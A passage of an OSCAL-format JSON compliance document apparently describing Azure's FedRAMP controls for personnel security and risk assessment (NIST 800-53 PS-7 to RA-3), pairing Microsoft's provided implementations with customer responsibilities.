third-party providers, are established by requiring them to comply with the Microsoft Information Security Policy. This includes personnel located at Microsoft subsidiaries and locations not owned by Microsoft, such as off-site facilities. Any third-party personnel with access to Azure must pass the same personnel screening process for the requirements established for the risk categorization of their role.\n\nIn all contracts, Microsoft includes provisions to ensure that third-party providers meet or exceed the personnel security requirements mandated by Microsoft. This includes the ability to successfully pass the Microsoft background check, or equivalent, as well as obtain and maintain additional clearances if the specific project requires it. Third-party providers that have access to the are subject to the same personnel screening requirements as Microsoft personnel working on Azure services for U.S. Government customers, including Federal background investigations.\n\nVendors and subcontractors that require logical access to Federal customer data, or physical access to controlled facilities that house Federal customer data (other than on an occasional or intermittent basis) for the Azure service are required to successfully complete Federal adjudicated background investigations.\n\nShould a vendor or subcontractor require physical access to controlled facilities that contain customer data, a cleared/authorized individual is provided as an escort and must accompany the vendor or subcontractor at all times while in the secured location."}],"responsibilities":[{"uuid":"3085493c-6030-43fd-b7f0-14deda2ec023","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"}],"description":"The customer is responsible for third-party personnel security.","provided-uuid":"8b59eff0-e8ac-447e-b54a-b426c490fe29"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0aca8366-308e-4e39-b772-8251cacc33df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.b","by-components":[{"uuid":"3de79a44-8da6-4a4a-bb5a-3417864176e0","export":{"provided":[{"uuid":"36dc0250-bac6-46d7-b091-414bec15b6e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"}],"description":"Azure requires vendors and contractors to have a signed contract to ensure compliance with Microsoft policies 
and procedures, including personnel security policies and procedures, on required engagements."}],"responsibilities":[{"uuid":"d866e0cc-150d-4286-833d-1955b21358a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"}],"description":"The customer is responsible for requiring third-party providers to comply with customer-defined personnel security policies and procedures.","provided-uuid":"36dc0250-bac6-46d7-b091-414bec15b6e4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"20b045d8-c208-4158-a699-ce473efec605","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.c","by-components":[{"uuid":"b136efc9-2ff1-406d-84ad-52657dae6f03","export":{"provided":[{"uuid":"a0e00a35-f99a-493e-8da4-556d504b39ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"}],"description":"Personnel security requirements are documented in all vendor contracts and the Addendum to Vendor Agreement (Background Requirements)."}],"responsibilities":[{"uuid":"a26ba118-7672-4f8d-bcec-f442bdfc7e47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"}],"description":"The customer is responsible for documenting third-party personnel security requirements defined in PS-07.a.","provided-uuid":"a0e00a35-f99a-493e-8da4-556d504b39ad"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9b2fed96-2a4d-4f64-bd41-cdc71f477b3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.d","by-components":[{"uuid":"c9b960ef-6215-413d-810c-32b0d4858c07","export":{"provided":[{"uuid":"f3e8fa63-810c-440a-b262-7bf421e82567","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"}],"description":"Microsoft documents third-party security requirements in the Microsoft Information Security Policy and associated standards (provided). Specific notification requirements for transfers and terminations of third-party personnel with access to Azure are identical to those for Microsoft personnel."}],"responsibilities":[{"uuid":"40ddb8a8-380e-4230-a6f2-25a3d9a6983a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"}],"description":"The customer is responsible for requiring third-party providers to notify customer-defined personnel/roles of any transfers/terminations of third-party personnel who possess customer credentials and/or badges within a customer-defined period of time.","provided-uuid":"f3e8fa63-810c-440a-b262-7bf421e82567"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1020267f-33b9-4c35-b0f9-e2921a49c0cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.e","by-components":[{"uuid":"bd453f0f-4786-47cb-b38c-7bbb26f8b4cf","export":{"provided":[{"uuid":"91432ddf-d577-4af5-b392-8d8d245de13c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"}],"description":"Microsoft monitors compliance with screening requirements for third-party personnel by tracking the outcome of screening directly. Microsoft requires approved screening vendors to submit screening outcomes for third-party personnel directly to Microsoft where they are tracked in HRIS and monitored by the groups contracting with the vendor."}],"responsibilities":[{"uuid":"6657b03d-4b24-444f-b459-17a5fc282858","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"}],"description":"The customer is responsible for third-party personnel security, including monitoring of third-party provider compliance with customer-defined requirements.","provided-uuid":"91432ddf-d577-4af5-b392-8d8d245de13c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"74096765-4f53-4dc4-8ab9-b2536c2dcfe0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-8","statements":[{"uuid":"f0f52d9d-e9aa-4006-85e8-0d71fbdd7cfd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-8_smt.a","by-components":[{"uuid":"73a04159-e70c-4929-9be2-2a6d4e128404","export":{"provided":[{"uuid":"d925a6c0-8c0a-4465-8388-857995dc1215","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"}],"description":"Microsoft's formal sanctions process for personnel failing to comply with established information security policies and procedures is defined in the Microsoft Information Security Policy. Specifically, depending on the particular type of misconduct, Microsoft's Online Services Staff suspected of committing breaches of security and/or violating Microsoft Security Program Policy (MSPP) are subject to an investigation process and appropriate disciplinary action up to and including termination.\n\nWhen the Microsoft Human Resources (HR) team is notified of a possible security violation, the Office of Legal Compliance (OLC) is consulted. The OLC team advises HR if it is in scope for their team. If the incident is in scope for OLC, OLC investigates the possible security violation and reconnects with HR and the employee's manager on the findings. 
If the allegation is substantiated, OLC recommends the disciplinary action to be taken and directs HR and the employee's manager to debrief the employee and implement the discipline. Violations of Microsoft Information Security policies, standards, or procedures may result in corrective action, up to and including immediate termination of employment. In some cases, a breach of Microsoft Information Security policies, standards, or procedures may also violate an international, federal, state, or local law. In such cases, the individual may also be subject to civil and/or criminal liability.\n\nOnce the OLC findings are delivered to HR and management, the employee, absent extenuating circumstances, is typically debriefed within two (2) weeks. The same timeline applies when HR leads an investigation that is not in scope for OLC.\n\nViolations that align with NIST 800-61 Rev. 2, Computer Security Incident Handling Guide, incident categories are reported to US-CERT and the impacted customer agency per the incident reporting requirements."}],"responsibilities":[{"uuid":"a9fb05c4-037d-4449-b89e-8cac08cff7b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"}],"description":"The customer is responsible for establishing a sanctions process for customer employees failing to comply with information security policies and procedures.","provided-uuid":"d925a6c0-8c0a-4465-8388-857995dc1215"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bf2731ba-2bd9-432e-8f90-1f2fce9384c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-8_smt.b","by-components":[{"uuid":"c2b9d27b-a793-49f5-a37f-7de45bf31429","export":{"provided":[{"uuid":"cd42728e-3606-49a1-937e-274b8f74a3b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"}],"description":"Microsoft's formal sanctions process for personnel failing to comply with established information security policies and procedures is defined in the Microsoft Information Security Policy. Specifically, depending on the particular type of misconduct, Microsoft's Online Services Staff suspected of committing breaches of security and/or violating Microsoft Security Program Policy (MSPP) are subject to an investigation process and appropriate disciplinary action up to and including termination.\n\nWhen the Microsoft Human Resources (HR) team is notified of a possible security violation, the Office of Legal Compliance (OLC) is consulted. The OLC team advises HR if it is in scope for their team. If the incident is in scope for OLC, OLC investigates the possible security violation and reconnects with HR and the employee's manager on the findings. If the allegation is substantiated, OLC recommends the disciplinary action to be taken and directs HR and the employee's manager to debrief the employee and implement the discipline. Violations of Microsoft Information Security policies, standards, or procedures may result in corrective action, up to and including immediate termination of employment. In some cases, a breach of Microsoft Information Security policies, standards, or procedures may also violate an international, federal, state, or local law. In such cases, the individual may also be subject to civil and/or criminal liability.\n\nOnce the OLC findings are delivered to HR and management, the employee, absent extenuating circumstances, is typically debriefed within two (2) weeks. The same timeline applies when HR leads an investigation that is not in scope for OLC.\n\nSecurity incidents are reported to US-CERT per the incident reporting requirements."}],"responsibilities":[{"uuid":"c1b9ee58-6f69-4db6-96c0-01ee69361f6b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"}],"description":"The customer is responsible for providing notifications, comprising the identification of the sanctioned individual and the reason for the sanction, to customer-defined personnel/roles within a customer-defined time period when a formal employee sanctions process is initiated.","provided-uuid":"cd42728e-3606-49a1-937e-274b8f74a3b8"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ad7cefd4-2d0b-4d32-83c5-ea601fce5403","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-9","statements":[{"uuid":"2da6caa5-98e8-42c9-8334-a545c77780a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-9_smt","by-components":[{"uuid":"3dd5ec91-61a4-493a-9051-6d1dd3b3e016","export":{"provided":[{"uuid":"a16e77a0-93f1-429c-bb11-d0ff2ffc72ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"}],"description":"Microsoft ensures that all Azure personnel including subcontractors have risk designations in place based on role assignments. The risk designation is based on the asset classification assigned to information accessed, including federal customer data. Asset classification is determined through the types of information the asset contains. Azure, in coordination with Microsoft Human Resources (HR), establishes screening criteria for Azure service team personnel by reviewing positions for risk as well as considering customer expectations. All personnel require the Microsoft Cloud Screen. Microsoft reviews the position risk designations as part of the annual Personnel Screening SOP update. All positions are subject to screening requirements. Privacy and security principles are embedded in personnel role assignments through the following training. Microsoft C+AI training and awareness components are classified into one of two types for personnel: Role-Based and Required.\n\nRole-Based Training: Role-Based training is mandatory security and awareness education that is deemed helpful in understanding the security processes and procedures for the particular role an individual is placed in and is directly related to the job responsibilities of the individual. Role-Based training is offered to full-time personnel through the STRIKE program for engineering disciplines, providing 200-400 level security training and best practices.\n\nRequired Training: Required training is mandatory security and awareness education that the Information Risk Management Council (IRMC) has specifically identified and defined as appropriate for Azure personnel based upon their organization. Required annual training includes Security Foundations for new hires and non-engineering FTEs and the STRIKE program for engineering FTEs."}],"responsibilities":[{"uuid":"bc864f15-9250-4ebd-b3d4-47f820a62a22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"}],"description":"The customer is responsible for incorporating security and privacy roles and responsibilities into organizational position descriptions for customer-deployed resources.","provided-uuid":"a16e77a0-93f1-429c-bb11-d0ff2ffc72ed"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d102226b-c0ec-425c-b0bd-ea8038e5e629","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-2","statements":[{"uuid":"055cdf78-1e0f-4cc2-b4ae-cf539141683d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.a","by-components":[{"uuid":"0f946020-d0d0-403c-b4b9-bc4d65d9abf8","export":{"provided":[{"uuid":"835837b8-c490-4a82-8a51-a0c2cb1e6609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"}],"description":"Microsoft has completed a system categorization of the Azure information and information system in accordance with Federal Information Processing Standards (FIPS) 199, Standards for Security Categorization of Federal Information and Information Systems, and NIST Special Publication 800-60 Volume 1 Revision 1, Guide for Mapping Types of Information and Information Systems to Security Categories. Azure completed a Security Authorization package that undergoes the process for a Provisional Authorization to Operate at a High/High/High impact level with appropriate security control overlays. Security categorization is a function of the data and the system. 
Azure is categorized as a FedRAMP High and DoD IL2 system."}],"responsibilities":[{"uuid":"5cd9f146-88a7-4ef3-96fa-828947ee7faa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"}],"description":"The customer is responsible for categorizing resources and the information contained in accordance with applicable Federal Laws, Executive Orders, directives, policies, regulations, standards, and guidance. Customer agencies/departments must separately categorize their data in agreement with FIPS 199, Standards for Security Categorization of Federal Information and Information Systems, and NIST SP 800-60 Rev. 1, Guide for Mapping Types of Information and Information Systems to Security Categories.","provided-uuid":"835837b8-c490-4a82-8a51-a0c2cb1e6609"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"00b02b28-8f4e-485a-81f6-8686cc521577","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.b","by-components":[{"uuid":"4c611a16-73f9-446c-afe2-00cdfedcfd9b","export":{"provided":[{"uuid":"1b08fcdf-0ae5-4ba2-8048-410280fcf46c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"}],"description":"The security categorization for Azure has been conducted and is documented in section 2 of this SSP. 
The overall security categorization has been assessed at the High impact level for CIA respectively as determined in accordance with Federal Information Processing Standards (FIPS) 199, Committee on National Security Systems Instruction (CNSSI) Number 1253, and Intelligence Community Directive (ICD) 503 guidelines. The security categorization process took into consideration supporting rationale for impact-level decisions and involved appropriate stakeholders and senior level organizational officials to review and approve the final security categorization activity."}],"responsibilities":[{"uuid":"32a7d31d-58eb-477a-a41a-95cd2eddcfe6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"}],"description":"The customer is responsible for documenting the security categorization results, including supporting rationale, defined in RA-02.a in the security plan.","provided-uuid":"1b08fcdf-0ae5-4ba2-8048-410280fcf46c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c599fe82-e817-434b-9225-bebf9425aea6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.c","by-components":[{"uuid":"cd833f48-83e4-44fb-b6b0-fb0ff9dd879d","export":{"provided":[{"uuid":"5eb8b83a-8e26-4ad0-bc85-dab2b8c2c996","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"}],"description":"Microsoft has provided the security categorization assessment in the Azure security authorization package for the review and approval of the FedRAMP JAB, DISA/DoD authorizing officials, and 
other regulators as required utilizing Azure."}],"responsibilities":[{"uuid":"31f78c87-1e01-439e-bd10-c9fc7aadcf71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"}],"description":"The customer is responsible for ensuring the security categorization decision is reviewed and approved by the authorizing official (AO) or designated representative responsible.","provided-uuid":"5eb8b83a-8e26-4ad0-bc85-dab2b8c2c996"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d9ef3cf2-c62e-45f3-86a6-3e0f69b931dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-3","statements":[{"uuid":"7db403ff-c7d9-42cc-a81d-975bc83050d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.a","by-components":[{"uuid":"29c164ec-8a6c-4546-a95e-a54d0fdbb11c","export":{"provided":[{"uuid":"74635fd2-c363-4dff-9eda-2d9e9b59764e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"}],"description":"Microsoft conducts assessments of the risk including the likelihood and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of Azure and the information it processes, stores, or transmits. 
The Security Assessment for Azure was completed in agreement with NIST Special Publication 800-30 Revision 1, Guide for Conducting Risk Assessments, and NIST Special Publication 800-53A Revision 4, Assessing Security and Privacy Controls in Federal Information Systems and Organizations: Building Effective Assessment Plans. Periodic risk assessments are performed for Azure to review the effectiveness of existing information security controls and safeguards, as well as to identify new risks. These assessments ensure all policies and supporting procedures properly address the environment in light of changing regulatory, contractual, business, technical, and operational requirements. Risk assessments take place annually, or more frequently as circumstances necessitate."}],"responsibilities":[{"uuid":"b316e95e-8cce-47cd-b9f6-e67bab519e10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"}],"description":"The customer is responsible for conducting a risk assessment that addresses the likelihood and magnitude of harm, from the unauthorized access, use, disclosure, disruption, modification, or destruction of customer-deployed resources and the information processed, stored, or transmitted. 
The customer is responsible for reviewing the Azure Security Authorization package and performing a risk assessment for any controls deferred to the customer relating to shared touch points as identified in the Azure Customer Responsibility Matrix.","provided-uuid":"74635fd2-c363-4dff-9eda-2d9e9b59764e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bbdd4c2e-2793-400b-92d4-70ef4320ad2c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.b","by-components":[{"uuid":"90a0c1a1-f20f-4814-9e8b-eb78bf457a8d","export":{"provided":[{"uuid":"3d7412a6-4023-4cd3-a3f4-09a06ac20a17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"}],"description":"Periodic risk assessments are performed for Azure to review the effectiveness of existing information security controls and safeguards, as well as to identify new risks. These assessments ensure all policies and supporting procedures properly address the environment in light of changing regulatory, contractual, business, technical, and operational requirements. The risk assessment results are integrated with risk management decisions and remediation plans for Azure. 
Risk assessments take place annually, or more frequently as circumstances necessitate."}],"responsibilities":[{"uuid":"2f4f4179-dbd6-4711-b452-9c6eab307405","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"}],"description":"The customer is responsible for integrating risk assessment results and risk management decisions from the organization and mission or business process perspectives with system-level risk assessments for customer-deployed resources.","provided-uuid":"3d7412a6-4023-4cd3-a3f4-09a06ac20a17"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"61e50a9d-3fb1-4d52-86ff-0b88b8a0f74f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.c","by-components":[{"uuid":"3ad97bc3-92f8-4f72-b9cf-19fe422f2411","export":{"provided":[{"uuid":"5601c5cc-f8b8-46aa-839d-78a8d6b55ccf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"}],"description":"The Azure security risk assessment takes place during the annual assessment. The assessment is conducted in accordance with the approved Security Assessment Plan (SAP). The security assessment results are documented under Security Assessment Report (SAR) report. 
The security assessment is completed by an approved Third Party Assessment Organization (3PAO)."}],"responsibilities":[{"uuid":"666d32e2-4bf7-4824-b420-786025c1a4ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"}],"description":"The customer is responsible for conducting a risk assessment and documenting the risk assessment results in the security plan, risk assessment report, and/or other customer-defined document.","provided-uuid":"5601c5cc-f8b8-46aa-839d-78a8d6b55ccf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2d4c7f69-b005-497a-989e-897fce697c86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.d","by-components":[{"uuid":"08b7f0e5-2c8d-4929-9f5f-e8111a2be6d6","export":{"provided":[{"uuid":"e80dd5b3-76bd-4990-8439-34d6759e1145","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"}],"description":"The risk assessment is completed as part of the original security authorization package and reviewed by Microsoft annually, or when a significant change occurs as defined in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems, Appendix F, Page F-7."}],"responsibilities":[{"uuid":"8637cfdb-7146-42b5-9262-a568d9b5b3f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"}],"description":"The customer is responsible for conducting a risk assessment and reviewing its results at a customer-defined 
frequency.","provided-uuid":"e80dd5b3-76bd-4990-8439-34d6759e1145"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"49ac9176-c347-4035-942c-4d89afc77b6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.e","by-components":[{"uuid":"c1ff338e-d16e-4677-a59f-d189ea961c96","export":{"provided":[{"uuid":"c5b85d04-db89-476d-8bc0-3399814c20eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"}],"description":"Azure submits risk assessment results to Azure management, including the Azure Program Managers. The annual SAR is submitted to the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required who review the package for sufficiency. 
Internally, the SAR is used to update the POA&M submissions."}],"responsibilities":[{"uuid":"e48d4eac-8c61-4e30-97d8-b3a517801001","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"}],"description":"The customer is responsible for conducting a risk assessment and disseminating its results to customer-defined personnel/roles.","provided-uuid":"c5b85d04-db89-476d-8bc0-3399814c20eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a31707c4-8add-42ae-9b67-1c3061eea2ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.f","by-components":[{"uuid":"535fcdb5-fb40-4049-81ff-a6f2c0141ed9","export":{"provided":[{"uuid":"7a494808-bb0d-43eb-8c3f-79034252eebf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"}],"description":"The risk assessment is completed as part of the original security authorization package and is updated by Microsoft annually, or when a significant change occurs as defined in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems, Appendix F, Page F-7. 
The information system may require an update to the risk assessment including, but not limited to, when one or more of the following circumstances occur: * Addition or replacement of a major component or a significant part of a major system * A change in security mode of operation * A change in interfacing systems * A significant change to the operating system or executive software * A breach of security, violation of system integrity, or any unusual situation that appears to invalidate the accreditation * A significant change to the physical structure housing the information system or environment of the information system that could affect the physical security described in the accreditation * A significant change to the threat that could adversely affect the systems * A significant change to the availability of safeguards * A significant change to the user population If any of these events should occur, the SSP and other affected Security Authorization Process documentation are updated to reflect the new information system components, or new operating environment. 
